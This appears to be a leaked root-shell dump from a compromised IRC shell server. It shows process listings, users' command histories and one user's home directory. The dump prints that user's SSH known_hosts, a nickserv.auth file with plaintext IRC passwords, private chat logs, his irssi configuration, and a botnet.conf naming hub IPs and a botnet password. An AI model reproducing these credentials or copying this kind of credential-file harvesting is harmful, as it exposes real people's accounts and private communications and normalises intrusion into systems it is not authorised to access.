+bollox     80752  0.0  0.2  3812  2152  p2- S     7Apr09   8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
+cazz1961   81636  0.0  0.2  3236  1784  p2- S     8May09  11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
+poolboy    85768  0.0  2.3 38696 23352  p2- S    13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
+qfx        85944  0.0  0.2  3592  2016  p2- S    10Jun09   0:53.81 ./psybnc
+tarawa     88344  0.0  3.0 31980 30444  p2- S    26May09   5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
+bollox     90551  0.0  0.3  4188  2616  p2- S    10Jun09   4:03.14 ./psybnc
+darien9      363  0.0  0.1 126420  1276  p3- S     6Mar08 967:34.73 ./psybnc
+sysc        3001  0.0  0.1 53544  1492  p3- S    27Jan08  28:52.73 ./psybnc
+sqd        15833  0.0  0.1 19444  1436  p3- S     4Aug08  27:53.54 ./psybnc
+crazyl     37528  0.0  0.1 20120  1464  p3- S    27Nov08   8:58.67 ./psybnc
+en0prcv    58418  0.0  0.1 67988  1228  p3- S     4Apr08  97:19.44 ./psybnc
+skypilot   65653  0.0  0.0  7460   388  p3- S    19Nov08   2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
+chevym4n    6472  0.0  0.1  5156   772  p4- S    27Jan08  17:56.69 ircd: pdev.SummitIRC.com (ircd)
+cpu        10289  0.0  0.2 27016  2152  p4- S    14Apr09   5:33.20 ./subdue
+cpu        10303  0.0  0.2 24588  1896  p4- S    14Apr09   4:56.34 ./arc
+oby1       18390  0.0  0.1 103980  1392  p4- S     8Oct08  37:31.06 ./psybnc
+skypilot   43173  0.0  0.1  5612   968  p4- S     3Nov08  10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
+cmm        60721  0.0  0.3 100744  3488  p4- S    10Apr09  50:30.96 ./psybncC
+cmm        60933  0.0  0.3 31732  2888  p4- S    10Apr09  26:32.93 ./psybncB
+cmm        61190  0.0  0.2 26200  2420  p4- S    10Apr09  14:16.41 ./psybncR
+pimpinjg   63286  0.0  0.2  3268  1776  p4  Is   Wed10PM   0:00.03 /usr/local/bin/bash
+pimpinjg   63289  0.0  0.9 12636  9372  p4  S+   Wed10PM   1:16.45 irssi -h 72.20.28.217
+darien9    74450  0.0  0.2 38220  2084  p4- S    31Oct08 107:35.62 ./psybnc
+digitalman 97383  0.0  0.2 12644  2436  p4- S    20May09   6:43.68 ./psybnc psybnc.conf
+chevym4n   11847  0.0  0.1  5892   756  p6- S    25Oct08  13:16.82 ircd: irc.SummitIRC.com (ircd)
+crrj13     60894  0.0  0.4 14816  4384  p6- S     6May09   1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
+lynx       71244  0.0  0.1 15292  1164  p6- S    27Aug08  13:54.41 ./psybnc
+yaquis     81249  0.0  0.2  2952  1664  p6- S     5Jun09   2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
+yaquis     81862  0.0  5.6 58788 57552  p6- S    13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
+darien9    95226  0.0  0.1  7876  1096  p6- S    23Jul08  20:45.03 ./psybnc
+baxxta     95367  0.0  0.1  8020  1144  p6- S    22Jul08  13:11.93 ./psybnc
+yaquis     98909  0.0  0.1  3140  1312  p6- S    30May09   1:26.70 ./psybnc
+nardi      18637  0.0  0.1  1480   680  p7- S    10Mar09  33:41.69 ./bopm
+crash      29763  0.0  0.3 32276  3504  p7- S    30Jan09 164:54.34 ./psybnc1
+mlh        52784  0.0  0.3  4584  3340  p7- S    10Jan09  22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+nyakz      54517  0.0  0.2 30984  2448  p7- S    13Mar09  52:56.09 ./psybnc
+nardi      76675  0.0  0.1  5024   912  p7- S     8Feb09   7:16.69 ircd: Java.Albworld.Net (ircd)
+sqd        77187  0.0  0.2  3352  1584  p7- S    21Jan09  13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
+darkuno3   77376  0.0  0.1  3400   792  p7- S    10Mar09   4:06.45 ircd: 72.20.28.219 (ircd)
+lyhne1     88130  0.0  0.4 10540  3712  p7- S    22Dec08  69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
+lymelyte   88229  0.0  0.3  3880  3016  p7- S    29Mar09   7:28.37 ircd: irc.ftaresource.com (ircd)
+chozen1    89082  0.0  0.1  3192  1032  p7- S     1Mar09   5:32.87 ./psybnc
+kokoryu    93127  0.0  0.3  4060  2852  p7- S     6Feb09  32:11.57 ./eggdrop (eggdrop-1.6.19)
+hts        96224  0.0  0.6 39004  6252  p7- S     2Mar09  51:21.25 ircd: vital.irc.hackthissite.org (ircd)
+visage     96264  0.0  0.2  3192  1692  p7- S    13Mar09   9:27.48 ./eggdrop -m (eggdrop-1.6.19)
+mrts       24165  0.0  0.2  3176  1612  p8- S    28Mar09   7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
+jax66      57226  0.0  0.1  1516   652  p8- S    11May09  24:51.69 ./bopm
+brosco     58343  0.0  0.2 15992  1800  p8- S    29Mar09   8:13.84 ./psybnc
+dv327      76866  0.0  0.1 27624  1208  p8- S     9Aug08  15:14.39 ./psybnc
+subkult    88094  0.0  0.1 72724  1280  p8- S    15Jan09  80:54.12 ./psybnc
+bluewish   97486  0.0  0.2  3552  1852  p8- S    29Mar09   8:28.42 ./eggdrop (eggdrop-1.6.19)
+brosco     31552  0.0  0.3  3792  2592  p9- S    16Mar09  14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
+mrts       32626  0.0  0.2  3176  1620  p9- S    20Mar09   8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
+poolboy    44789  0.0  0.2  3448  1956  p9- S     9Feb09  15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
+poolboy    44901  0.0  0.2  3312  1896  p9- S     9Feb09  15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
+bollox     60129  0.0  0.3  5308  3376  p9- S     4Jun09   2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
+bollox     60150  0.0  0.3  5164  3280  p9- S     4Jun09   2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
+brosco     76877  0.0  0.2  3760  2348  p9- S    19Mar09  13:04.80 ./eggdrop-1.6.19 -m plague.conf
+crash      99452  0.0  0.2 37052  2128  p9- S    19Mar09  12:20.42 ./psybnc-oth
+paleride     265  0.0  0.2  3648  2092  pb- S    27Jan09  19:36.88 ircd: irc.leechnet.net (ircd)
+paleride     908  0.0  0.1  4276   788  pb- S    27Jan09   1:40.52 ./services -nofork
+grumpy     79140  0.0  0.3  5576  2692  pb- S     4Feb09  16:37.28 ircd: irc.sidnaceous.com (ircd)
+grumpy     82947  0.0  0.1  7572  1140  pb- I     4Feb09   1:28.12 ./services start
+nardi      17529  0.0  0.1 25992  1028  pc- S    24Mar09  23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
+cazz1961   17100  0.0  0.6  8824  6268  pd- S    Sun06AM  87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
+omgwtf     29455  0.0  0.2  3408  1996  pd- S    Sat04AM   0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
+omgwtf     29570  0.0  0.2  3572  2228  pd- S    Sat04AM   0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
+zeepysea   37950  0.0  0.2  3684  1952  pd- S    17Mar09  10:42.06 ircd: irc.eoegameservers.com (ircd)
+zeepysea   38077  0.0  0.1  8204  1092  pd- S    17Mar09   1:07.05 ./services start
+genosyde   63662  0.0  0.2 17308  2432  pd- S    27Jan09  21:57.28 ./psybnc
+matt       83686  0.0  0.1  3140  1184  pd- S    Sat05PM   0:17.40 ./psybnc psybnc.conf
+mrts       84263  0.0  0.2  3172  1636  pd- S    20Mar09   8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
+yaquis     94000  0.0  0.5 58432  5312  pd- S    Fri10PM   4:51.24 ircd: irc2.accesox.net (ircd)
+cont       49538  0.0  0.2 19684  1784  pe- S    11Jan09  12:46.04 ./psybnc
+chaos1     56819  0.0  0.8 11604  8064  pf- I    18Jun09   0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
+[root@velocity:/var/run]# 
+
+[root@velocity:~]# lastcomm -u romeo
+sh               -       romeo            __         0.00 us
+ls               -       romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+w                -       romeo            ttyp1      0.00 us
+sh               -       romeo            ttyp1      0.00 us
+sshd             -F      romeo            __         0.59 us
+bash             -       romeo            ttyp1      0.00 us
+ls               -       romeo            ttyp1      0.00 us
+w                -       romeo            ttyp1      0.00 us
+screen           -       romeo            ttyp1      0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+screen           -F      romeo            __         0.00 us
+w                -       romeo            ttyp1      0.00 us
+sh               -       romeo            ttyp1      0.00 us
+
+[root@velocity:~]# lastcomm -u pimpinjg
+sshd             -F      pimpinjg         __         0.00 us
+bash             -       pimpinjg         ttyp2      0.00 us
+screen           -       pimpinjg         ttyp2      0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+fortune          -       pimpinjg         ttyp2      0.00 us
+sshd             -F      pimpinjg         __         0.00 us
+sftp-server      -       pimpinjg         __         0.02 us
+sshd             -F      pimpinjg         __         0.03 us
+bash             -       pimpinjg         ttyp2      0.00 us
+tput             -       pimpinjg         ttyp2      0.00 us
+screen           -       pimpinjg         ttyp2      0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+screen           -F      pimpinjg         __         0.00 us
+fortune          -       pimpinjg         ttyp2      0.00 us
+
+
+[root@velocity:/home/romeo]# ls -la 
+total 80
+drwxr-xr-x    4 romeo  romeo   512 Jun 27 21:56 ./
+drwx--x--x  204 root   wheel  3584 Jun 17 18:30 ../
+-rw-------    1 romeo  romeo     5 Jun 17 18:35 .bash_history
+-rw-r--r--    1 romeo  romeo    44 Jun 13 08:05 .bash_profile
+-rw-r--r--    1 romeo  romeo  2469 Jun 13 08:00 .bashprompt
+-rw-r--r--    1 romeo  romeo   258 Jun 13 08:03 .bashrc
+-rw-r--r--    1 romeo  romeo   767 Jun 13 07:56 .cshrc
+-rw-r--r--    1 romeo  romeo    23 Jun 17 18:39 .forward
+drwx------    4 romeo  romeo   512 Jun 17 09:42 irclogs/
+drwx------    3 romeo  romeo   512 Jun 17 09:42 .irssi/
+-rw-------    1 romeo  romeo    35 Jun 26 17:58 .lesshst
+-rw-r--r--    1 romeo  romeo   248 Jun 13 07:56 .login
+-rw-r--r--    1 romeo  romeo   158 Jun 13 07:56 .login_conf
+-rw-------    1 romeo  romeo   373 Jun 13 07:56 .mail_aliases
+-rw-r--r--    1 romeo  romeo   331 Jun 13 07:56 .mailrc
+-rw-r--r--    1 romeo  romeo   797 Jun 13 07:56 .profile
+-rw-------    1 romeo  romeo   276 Jun 13 07:56 .rhosts
+-rw-r--r--    1 romeo  romeo   975 Jun 13 07:56 .shrc
+drwx------    2 romeo  romeo   512 Jun 20 02:58 .ssh/
+
+[root@velocity:/home/romeo]# cat .ssh/known_hosts 
+72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
+189.14.205.42 ssh-dss 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
+opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
+quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
+[root@velocity:/home/romeo]#
+
+[root@velocity:/home/romeo/.irssi]# ls -la 
+total 108
+drwx------  3 romeo  romeo   512 Jun 17 09:42 ./
+drwxr-xr-x  4 romeo  romeo   512 Jun 27 21:56 ../
+-rw-------  1 romeo  romeo  4500 Jun 28 02:13 away.log
+-rw-r--r--  1 romeo  romeo  9591 Jun 27 22:51 config
+-rw-r-----  1 romeo  romeo   584 Jun 17 07:16 config.old
+-rw-r-----  1 romeo  romeo  8472 Jun 27 21:56 default.theme
+-rw-r--r--  1 romeo  romeo  8466 Feb 20 16:08 fear2.theme
+-rw-------  1 romeo  romeo    70 Jun 17 07:31 nickserv.auth
+-rw-r--r--  1 romeo  romeo    74 Jun 17 07:31 nickserv.networks
+-rw-r--r--  1 romeo  romeo  4667 Jun 27 21:56 pandemonium.theme
+drwxr-xr-x  3 romeo  romeo   512 Jun 22 17:50 scripts/
+[root@velocity:~]# 
+
+[root@velocity:/home/romeo/.irssi]# cat nickserv.auth 
+secchat RoMeO   ve2aZCp3GYoq
+bhf     RoMeO   ra7plmyt
+tdirc   RoMeO   sidfh928rf783
+[root@velocity:~]# 
+
+[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log 
+--- Log opened Tue Jun 30 01:08:25 2009
+01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
+01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
+01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e 
+02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
+--- Log closed Tue Jun 30 04:12:51 2009
+--- Log opened Tue Jun 30 19:19:25 2009
+19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
+19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
+19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
+20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
+--- Log closed Tue Jun 30 20:06:56 2009
+--- Log opened Tue Jun 30 21:22:55 2009
+21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
+21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
+21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
+--- Log closed Tue Jun 30 22:17:55 2009
+--- Log opened Wed Jul 01 00:59:13 2009
+--- Log closed Wed Jul 01 01:00:01 2009
+--- Log opened Wed Jul 01 01:00:23 2009
+01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e 
+01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
+01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
+01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
+01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
+01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e 
+01:34 #bhf: (c+c>/HTHg) ehis response:  when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
+01:34 #bhf: (cc8/Darkg8/:3/Romeog) e 
+01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
+01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
+--- Log closed Wed Jul 01 02:43:40 2009
+--- Log opened Wed Jul 01 03:32:17 2009
+--- Log closed Wed Jul 01 03:32:22 2009
+--- Log opened Wed Jul 01 03:32:24 2009
+--- Log closed Wed Jul 01 05:38:09 2009
+--- Log opened Wed Jul 01 06:53:32 2009
+--- Log closed Wed Jul 01 06:53:36 2009
+--- Log opened Wed Jul 01 06:53:44 2009
+07:03 #darkmindz: (c&c>/Xiresg) e http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
+[root@velocity:/]# 
+
+
+[root@velocity:/home/romeo/.irssi]# cat config
+servers = (
+  { address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
+  { address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
+  { 
+    address = "irc.undernet.org";
+    chatnet = "Undernet";
+    port = "6667";
+  },
+  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
+  { address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
+  { address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
+  { address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
+  { address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
+  {
+    address = "irc.securitychat.org";
+    chatnet = "secchat";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  },
+  { 
+    address = "irc.blackhat-forums.com";
+    chatnet = "bhf";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  },
+  {
+    address = "irc.tdirc.net";
+    chatnet = "tdirc";
+    port = "6667";
+    autoconnect = "yes";
+    nick = "RoMeO";
+  }
+);
+
+chatnets = {
+  IRCNet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "3";
+    max_msgs = "5";
+    max_whois = "4";
+    max_query_chans = "5";
+  };
+  EFNet = { 
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "4";
+    max_msgs = "3";
+  };
+  Undernet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "3";
+    max_msgs = "3";
+  };
+  DALNet = { 
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "6";
+    max_msgs = "3";
+  };
+  OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
+  GIMPNet = {
+    type = "IRC";
+    max_kicks = "4";
+    max_modes = "4";
+    max_msgs = "3";
+  };
+  PTLink = {
+    type = "IRC";
+    max_kicks = "1";
+    max_modes = "6";
+    max_msgs = "100";
+  };
+  SILC = { type = "SILC"; };
+  secchat = { type = "IRC"; };
+  bhf = { type = "IRC"; };
+  tdirc = { type = "IRC"; };
+};
+
+channels = (
+
+  { name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
+  { name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
+  { name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
+  { name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
+); 
+
+aliases = {
+  J = "join";
+  WJOIN = "join -window";
+  WQUERY = "query -window";
+  LEAVE = "part";
+  BYE = "quit";
+  EXIT = "quit";
+  SIGNOFF = "quit";
+  DESCRIBE = "action";
+  DATE = "time";
+  HOST = "userhost";
+  LAST = "lastlog";
+  SAY = "msg *";
+  WI = "whois";
+  WII = "whois $0 $0";
+  WW = "whowas";
+  W = "who";
+  N = "names";
+  M = "msg";
+  T = "topic";
+  C = "clear";
+  CL = "clear";
+  K = "kick";
+  KB = "kickban";
+  KN = "knockout";
+  BANS = "ban";
+  B = "ban";
+  MUB = "unban *";
+  UB = "unban";
+  IG = "ignore";
+  UNIG = "unignore";
+  SB = "scrollback";
+  UMODE = "mode $N";
+  WC = "window close";
+  WN = "window new hide";
+  SV = "say Irssi $J ($V) - http://irssi.org/";
+  GOTO = "sb goto";
+  CHAT = "dcc chat";
+  RUN = "SCRIPT LOAD";
+  SBAR = "STATUSBAR";
+  INVITELIST = "mode $C +I";
+};
+
+statusbar = {
+  # formats:
+  # when using {templates}, the template is shown only if its argument isnt
+  # empty unless no argument is given. for example {sb} is printed always,
+  # but {sb $T} is printed only if $T isnt empty.
+
+  items = {
+    # start/end text in statusbars
+    barstart = "{sbstart}";
+    barend = "{sbend}";
+
+    # treated "normally", you could change the time/user name to whatever
+    time = "{sb $Z}";
+    user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";
+
+    # treated specially .. window is printed with non-empty windows,
+    # window_empty is printed with empty windows
+    window = "{sb $winref:$T{sbmode $M}}";
+    window_empty = "{sb $winref{sbservertag $tag}}";
+    prompt = "{prompt $[.15]T}";
+    prompt_empty = "{prompt $winname}";
+    topic = " $topic";
+    topic_empty = " Irssi v$J - http://irssi.org/help/";
+
+    # all of these treated specially, theyre only displayed when needed
+    lag = "{sb Lag: $0-}";
+    act = "{sb Act: $0-}";
+    more = "-- more --";
+  };
+
+  # theres two type of statusbars. root statusbars are either at the top
+  # of the screen or at the bottom of the screen. window statusbars are at
+  # the top/bottom of each split window in screen.
+  default = {
+    # the "default statusbar" to be displayed at the bottom of the window.
+    # contains all the normal items.
+    window = {
+      disabled = "no";
+
+      # window, root
+      type = "window";
+      # top, bottom
+      placement = "bottom";
+      # number
+      position = "1";
+      # active, inactive, always
+      visible = "active";
+
+      # list of items in statusbar in the display order
+      items = {
+        barstart = { priority = "100"; };
+        time = { };
+        user = { };
+        window = { };
+        window_empty = { };
+        lag = { priority = "-1"; };
+        act = { priority = "10"; };
+        more = { priority = "-1"; alignment = "right"; };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+
+    # statusbar to use in inactive split windows
+    window_inact = {
+      type = "window";
+      placement = "bottom";
+      position = "1";
+      visible = "inactive";
+      items = {
+        barstart = { priority = "100"; };
+        window = { };
+        window_empty = { };
+        more = { priority = "-1"; alignment = "right"; };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+
+    # we treat input line as yet another statusbar :) Its possible to
+    # add other items before or after the input line item.
+    prompt = {
+      type = "root";
+      placement = "bottom";
+      # we want to be at the bottom always
+      position = "100";
+      visible = "always";
+      items = {
+        prompt = { priority = "-1"; };
+        prompt_empty = { priority = "-1"; };
+        # treated specially, this is the real input line.
+        input = { priority = "10"; };
+      };
+    };
+
+    # topicbar
+    topic = {
+      type = "root";
+      placement = "top";
+      position = "1";
+      visible = "always";
+      items = {
+        barstart = { priority = "100"; };
+        topic = { };
+        topic_empty = { };
+        barend = { priority = "100"; alignment = "right"; };
+      };
+    };
+  };
+};
+settings = {
+  core = {
+    real_name = "romeo haxxor"; // "romeo haxxed"
+    user_name = "RoMeO";
+    nick = "RoMeO";
+
+    timestamp_format = "%H:%M:%S";
+    hostname = "absolute.ownage.net"; // absolutely owned..
+  };
+  "fe-common/core" = {
+    autolog = "no";
+    autolog_path = "~/irclogs/$tag/$0-%m%y.log";
+    show_nickmode_empty = "yes";
+    theme = "pandemonium";
+    autocreate_own_query = "no";
+    autocreate_query_level = "DCCMSGS";
+    use_status_window = "no";
+    use_msgs_window = "yes";
+  };
+  "fe-text" = {
+    colors = "yes";
+    autostick_split_windows = "yes";
+    actlist_sort = "refnum";
+  };
+};
+logs = { };
+ignores = ( );
+keyboard = (
+  { key = "meta-1"; id = "change_window"; data = "1"; },
+  { key = "meta-2"; id = "change_window"; data = "2"; },
+  { key = "meta-3"; id = "change_window"; data = "3"; },
+  { key = "meta-4"; id = "change_window"; data = "4"; },
+  { key = "meta-5"; id = "change_window"; data = "5"; },
+  { key = "meta-6"; id = "change_window"; data = "6"; },
+  { key = "meta-7"; id = "change_window"; data = "7"; },
+  { key = "meta-8"; id = "change_window"; data = "8"; },
+  { key = "meta-9"; id = "change_window"; data = "9"; },
+  { key = "meta-0"; id = "change_window"; data = "10"; }
+);
+
+hilights = (
+  { text = "RoMeO"; nick = "yes"; word = "yes"; },
+  { text = "darkmindz"; nick = "yes"; word = "yes"; },
+  { text = "antisec"; nick = "yes"; word = "yes"; }, 
+  { text = "anti-sec"; nick = "yes"; word = "yes"; },
+  { text = "zf0"; nick = "yes"; word = "yes"; },
+  { text = "strayfe"; nick = "yes"; word = "yes"; },
+  { text = "n3w7yp3"; nick = "yes"; word = "yes"; },
+  { text = "copyandpaste"; nick = "yes"; word = "yes"; },
+  { text = "blackhat"; nick = "yes"; word = "yes"; },
+  { text = "whitehat"; nick = "yes"; word = "yes"; },
+  { text = "b0rx"; nick = "yes"; word = "yes"; }
+); // I wonder.. zf0?.. Lulz
+
+windows = {
+  1 = { };
+  2 = { 
+    immortal = "yes";
+    name = "(msgs)";
+    level = "MSGS ACTIONS DCCMSGS";
+  };
+  3 = {
+    items = (
+      { 
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#bhf";
+        tag = "bhf";
+      }
+    );
+  };
+  4 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#gso-chat";
+        tag = "bhf";
+      }
+    );
+  };
+  5 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#r00tsecurity";
+        tag = "tdirc";
+      }
+    );
+  };
+  6 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#thedefaced";
+        tag = "tdirc";
+      }
+    );
+  };
+  7 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#zer0zone";
+        tag = "tdirc";
+      }
+    );
+  };
+  8 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#kinqpinz";
+        tag = "secchat";
+      }
+    );
+  };
+  9 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#darkmindz";
+        tag = "secchat";
+      }
+    );
+  };
+  10 = {
+    items = (
+      {
+        type = "CHANNEL";
+        chat_type = "IRC";
+        name = "#astalavista";
+        tag = "secchat";
+      }
+    );
+  };
+};
+mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };
+
+
+[root@velocity:/tmp/...]# cat botnet.conf 
+set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
+set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
+set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
+set owner "shoes , rizo" ; # owner(s) ("Jmns")
+set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
+set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
+source harry.tcl
+[root@velocity:/tmp/...]# 
+
+[root@velocity:/]# ls -la
+total 129
+drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ./
+drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ../
+-rw-r--r--    2 root  wheel      801 Jan 12  2007 .cshrc
+drwxr-xr-x    2 root  wheel      512 Jun 29 16:00 .dev/
+-rw-r--r--    2 root  wheel      251 Jan 12  2007 .profile
+drwxrwxr-x    2 root  operator   512 Apr 12  2007 .snap/
+-r--r--r--    1 root  wheel     6196 Jan 12  2007 COPYRIGHT
+drwxr-xr-x    2 root  wheel     1024 Apr 16  2007 bin/
+drwxr-xr-x    6 root  wheel      512 Apr 16  2007 boot/
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 cdrom/
+lrwxr-xr-x    1 root  wheel       10 Apr 12  2007 compat@ -> usr/compat
+dr-xr-xr-x    4 root  wheel      512 Dec 31  1969 dev/
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 dist/
+-rw-------    1 root  wheel     4096 Apr 16  2007 entropy
+drwxr-xr-x   19 root  wheel     2048 Jun 28 21:09 etc/
+lrwxrwxrwx    1 root  wheel        8 Apr 12  2007 home@ -> usr/home
+drwxr-xr-x    2 root  wheel      512 Apr 12  2007 home2/
+-rw-r--r--    1 root  wheel        0 Oct  5  2007 jj.log
+lrwxr-xr-x    1 root  wheel       22 Apr 15  2007 kernconf@ -> /usr/src/sys/i386/conf
